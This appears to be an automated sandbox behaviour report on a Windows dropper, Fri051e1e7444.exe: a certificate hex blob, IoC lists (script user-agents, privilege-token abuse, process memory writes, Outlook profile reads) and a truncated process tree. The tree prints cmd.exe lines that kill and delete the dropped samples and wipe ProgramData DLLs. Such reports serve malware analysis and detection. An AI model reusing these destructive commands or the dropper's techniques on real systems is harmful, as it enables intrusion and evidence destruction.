0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f DYbALA.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 64 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 413 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 551 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 985 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1300 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1934 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2107 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2278 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1277 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1721 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1733 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1784 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1799 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 895 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 956 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1269 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1754 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2062 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 869 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1011 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1117 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2147 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2408 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 708 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1817 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1876 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2379 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1303 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1365 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1967 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2267 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2321 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1684 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2126 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2307 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 615 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 980 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1032 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2411 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 894 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 994 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1898 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2068 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 495 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2090 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 891 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1437 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1631 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1512 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1001 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1257 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2082 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2308 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 606 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2346 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1559 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2092 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 540 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 630 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1816 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2007 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2110 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2243 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2326 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri051e1e7444.exeRqcBdtquQCGLaKIMXJSNd_ZL.exepid Process 4304 Fri051e1e7444.exe 4304 Fri051e1e7444.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
foldershare.exeShellExperienceHost.exepid Process 2672 3932 foldershare.exe 4456 ShellExperienceHost.exe -
Suspicious behavior: MapViewOfSection 29 IoCs
Processes:
OcB4jBzI70tFnRtK1WZB1Ocm.exeEF78.exeMicrosoftEdgeCP.exe3E6B.exeregsvr32.exeregsvr32.exeghdhvtsrvdhvtsregsvr32.exeghdhvtsrvdhvtspid Process 2768 OcB4jBzI70tFnRtK1WZB1Ocm.exe 344 EF78.exe 3512 MicrosoftEdgeCP.exe 5804 3E6B.exe 5412 regsvr32.exe 5228 regsvr32.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 224 ghdhvts 904 rvdhvts 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 6868 regsvr32.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 4244 ghdhvts 7608 rvdhvts 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
UJrypcnxqC2LaOpY9q8RWOKu.exefgEDF5i3cgIOuMMvQaNZ1NCZ.exeDownFlSetup999.exen6LyyW6Y130rISPizyLnNBN_.exeDYbALA.exetaskkill.exedescription pid Process Token: SeDebugPrivilege 4984 UJrypcnxqC2LaOpY9q8RWOKu.exe Token: SeDebugPrivilege 4236 fgEDF5i3cgIOuMMvQaNZ1NCZ.exe Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeDebugPrivilege 1900 DownFlSetup999.exe Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeCreateTokenPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeAssignPrimaryTokenPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeLockMemoryPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeIncreaseQuotaPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeMachineAccountPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeTcbPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSecurityPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeTakeOwnershipPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeLoadDriverPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSystemProfilePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSystemtimePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeProfSingleProcessPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeIncBasePriorityPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeCreatePagefilePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeCreatePermanentPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeBackupPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeRestorePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeShutdownPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeDebugPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeAuditPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSystemEnvironmentPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeChangeNotifyPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeRemoteShutdownPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeUndockPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSyncAgentPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeEnableDelegationPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeManageVolumePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeImpersonatePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeCreateGlobalPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 31 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 32 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 33 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 34 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 35 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeDebugPrivilege 4500 DYbALA.exe Token: SeDebugPrivilege 4832 taskkill.exe Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 Token: SeCreatePagefilePrivilege 2672 Token: SeShutdownPrivilege 2672 -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
setup.tmpCalculator.exepid Process 2672 2672 5276 setup.tmp 6552 Calculator.exe 2672 2672 2672 2672 -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exepid Process 2672 968 MicrosoftEdge.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Fri051e1e7444.exeOcB4jBzI70tFnRtK1WZB1Ocm.exexcW3TuSn3KSNmakFvG9gZQDx.exeaoWnOtt3BnvpIQ5LuYSMKmgs.exegXt9NtnPmMCRWaXBrQk8NfGb.execwvHAknFTAWGE2B0rxX1TkrF.exedescription pid Process procid_target PID 4304 wrote to memory of 1180 4304 Fri051e1e7444.exe 71 PID 4304 wrote to memory of 1180 4304 Fri051e1e7444.exe 71 PID 4304 wrote to memory of 3876 4304 Fri051e1e7444.exe 72 PID 4304 wrote to memory of 3876 4304 Fri051e1e7444.exe 72 PID 4304 wrote to memory of 3876 4304 Fri051e1e7444.exe 72 PID 4304 wrote to memory of 4368 4304 Fri051e1e7444.exe 73 PID 4304 wrote to memory of 4368 4304 Fri051e1e7444.exe 73 PID 4304 wrote to memory of 4368 4304 Fri051e1e7444.exe 73 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4304 wrote to memory of 4984 4304 Fri051e1e7444.exe 75 PID 4304 wrote to memory of 4984 4304 Fri051e1e7444.exe 75 PID 4304 wrote to memory of 4236 4304 Fri051e1e7444.exe 76 PID 4304 wrote to memory of 4236 4304 Fri051e1e7444.exe 76 PID 4304 wrote to memory of 4236 4304 Fri051e1e7444.exe 76 PID 4304 wrote to memory of 4668 4304 Fri051e1e7444.exe 77 PID 4304 wrote to memory of 4668 4304 Fri051e1e7444.exe 77 PID 4304 wrote to memory of 4668 4304 Fri051e1e7444.exe 77 PID 4304 wrote to memory of 3680 4304 Fri051e1e7444.exe 78 PID 4304 wrote to memory of 3680 4304 Fri051e1e7444.exe 78 PID 4304 wrote to memory of 3680 4304 Fri051e1e7444.exe 78 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 4304 wrote to memory of 772 4304 Fri051e1e7444.exe 81 PID 4304 wrote to memory of 772 4304 Fri051e1e7444.exe 81 PID 4304 wrote to memory of 772 4304 Fri051e1e7444.exe 81 PID 772 wrote to memory of 740 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 82 PID 772 wrote to memory of 740 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 82 PID 772 wrote to memory of 740 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 82 PID 4304 wrote to memory of 708 4304 Fri051e1e7444.exe 83 PID 4304 wrote to memory of 708 4304 Fri051e1e7444.exe 83 PID 4304 wrote to memory of 708 4304 Fri051e1e7444.exe 83 PID 4304 wrote to memory of 996 4304 Fri051e1e7444.exe 84 PID 4304 wrote to memory of 996 4304 Fri051e1e7444.exe 84 PID 4304 wrote to memory of 996 4304 Fri051e1e7444.exe 84 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 4304 wrote to memory of 1308 4304 Fri051e1e7444.exe 86 PID 4304 wrote to memory of 1308 4304 Fri051e1e7444.exe 86 PID 708 wrote to memory of 1740 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 87 PID 708 wrote to memory of 1740 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 87 PID 708 wrote to memory of 1900 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 90 PID 708 wrote to memory of 1900 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 90 PID 708 wrote to memory of 1576 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 89 PID 708 wrote to memory of 1576 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 89 PID 708 wrote to memory of 1576 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 89 PID 1308 wrote to memory of 1276 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 91 PID 1308 wrote to memory of 1276 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 91 PID 1308 wrote to memory of 1276 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 91 PID 4304 wrote to memory of 3824 4304 Fri051e1e7444.exe 92 PID 4304 wrote to memory of 3824 4304 Fri051e1e7444.exe 92 PID 4304 wrote to memory of 3824 4304 Fri051e1e7444.exe 92 PID 4304 wrote to memory of 3276 4304 Fri051e1e7444.exe 93 PID 4304 wrote to memory of 3276 4304 Fri051e1e7444.exe 93 PID 4304 wrote to memory of 3276 4304 Fri051e1e7444.exe 93 PID 4304 wrote to memory of 3196 4304 Fri051e1e7444.exe 94 -
outlook_office_path 1 IoCs
Processes:
727C.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 727C.exe -
outlook_win_path 1 IoCs
Processes:
727C.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 727C.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe"C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1180
-
-
C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe"C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe" & del C:\ProgramData\*.dll & exit3⤵PID:648
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f4⤵
- Kills process with taskkill
PID:2012
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:2832
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2768
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe"C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe"C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"3⤵
- Executes dropped EXE
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"4⤵
- Executes dropped EXE
PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit5⤵PID:2496
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Soft1WW02.exe /f6⤵
- Kills process with taskkill
PID:4336
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:500
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
- Executes dropped EXE
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp" /SL5="$F01CC,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:200 -
